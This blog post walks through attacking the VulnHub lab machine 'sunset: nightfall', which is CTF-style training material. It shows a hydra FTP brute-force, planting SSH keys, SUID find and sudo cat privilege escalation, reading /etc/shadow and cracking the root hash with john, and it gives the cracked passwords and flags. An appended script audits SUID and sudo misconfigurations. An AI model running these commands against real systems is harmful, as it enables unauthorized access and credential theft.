PJzhang: vulnhub target machine, sunset series, SUNSET: NIGHTFALL

Morning~~~

Address: https://www.vulnhub.com/entry/sunset-nightfall,355/

The focus is on the tools and the line of reasoning.

nmap 192.168.43.0/24
Target machine IP: 192.168.43.14

nmap -A -p1-65535 192.168.43.14
21/tcp open ftp
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql

Visiting http://192.168.43.14/ shows the apache2 debian page

enum4linux 192.168.43.14
S-1-22-1-1000 Unix User\nightfall (Local User)
S-1-22-1-1001 Unix User\matt (Local User)

Top 100,000 most common passwords overseas
https://www.ncsc.gov.uk/static-assets/documents/PwnedPasswordsTop100k.txt

hydra -L /root/Desktop/user.txt -P /usr/share/wordlists/top1000.txt -f 192.168.43.14 ftp

Username/password: matt/cheese
Log in at ftp://192.168.43.14/; the directory is /home/matt

On the attacking machine, run ssh-keygen
This generates /root/.ssh/id_rsa.pub and /root/.ssh/id_rsa

cat id_rsa.pub > authorized_keys

ftp 192.168.43.14
mkdir .ssh
cd .ssh
put id_rsa.pub
put authorized_keys
put id_rsa

ssh matt@192.168.43.14, login succeeds

Find files with the SUID bit set
find / -perm -u=s -type f 2>/dev/null
ls -al /scripts/find
cat /etc/passwd
This reveals the nightfall user
cd /home/nightfall
cat user.txt
97fb7140ca325ed96f67be3c9e30083d

Obtain nightfall privileges
/scripts/find . -exec "/bin/sh" -p \;

sudo -l, fails

python3 -m http.server 8080

cd /home/nightfall
ls -al
cd .ssh
wget http://192.168.43.154:8080/authorized_keys

ssh nightfall@192.168.43.14, which gives nightfall privileges

sudo -l
(root) NOPASSWD: /usr/bin/cat

sudo /usr/bin/cat /etc/shadow

Copy the second field of the root entry and save it as mima.txt

john /root/Desktop/mima.txt, cracked as miguel2

su root, then just enter the password

cat root_super_secret_flag.txt, in the home directory
flag{9a5b21fc6719fe33004d66b703d70a39}
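
Both escalation steps above depend on local misconfiguration: a SUID copy of find at /scripts/find and a NOPASSWD sudo rule for /usr/bin/cat. As an added example (not part of the original post), these shell functions audit the output of `find / -perm -u=s -type f` and `sudo -l` for such entries; the function names, the directory allowlist and the program list are assumptions chosen for illustration.

```shell
#!/bin/sh
# Added example, not from the original post. The lists below are assumptions.
set -f  # paths and rules are data: never glob-expand them

# Directories where a Debian install normally keeps SUID binaries.
SUID_DIRS="/usr/bin /usr/sbin /bin /sbin /usr/lib /usr/libexec"
# Programs that can run commands or read any file with the privileges they
# are granted (short illustrative list; includes find and cat from this page).
RISKY_BINS="find cat vim less awk python3 bash sh"

# in_list WORD ITEM...: succeeds if WORD equals one of the ITEMs.
in_list() {
    word=$1; shift
    for item in "$@"; do [ "$item" = "$word" ] && return 0; done
    return 1
}

# audit_suid: reads SUID file paths on stdin, one per line, prints findings.
audit_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        dir_ok=no
        for d in $SUID_DIRS; do
            case $path in "$d"/*) dir_ok=yes ;; esac
        done
        if in_list "${path##*/}" $RISKY_BINS; then
            echo "HIGH $path: SUID on a program that can run commands or read files"
        elif [ "$dir_ok" = no ]; then
            echo "WARN $path: SUID binary outside the system directories"
        fi
    done
}

# audit_sudo: reads `sudo -l` output on stdin, flags NOPASSWD rules that
# name a risky program. Only absolute paths in the rule are examined.
audit_sudo() {
    while IFS= read -r line; do
        case $line in *NOPASSWD:*) ;; *) continue ;; esac
        for cmd in $(printf '%s' "${line#*NOPASSWD:}" | tr ',' ' '); do
            case $cmd in /*) ;; *) continue ;; esac
            if in_list "${cmd##*/}" $RISKY_BINS; then
                echo "HIGH sudo NOPASSWD $cmd: usable as the target user without a password"
            fi
        done
    done
}

# Use: find / -perm -u=s -type f 2>/dev/null | audit_suid
#      sudo -l | audit_sudo
```

Removing the SUID bit from /scripts/find and dropping the NOPASSWD rule for /usr/bin/cat clears both HIGH findings on this machine.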

 

posted @ 2020-09-08 22:16  PJzhang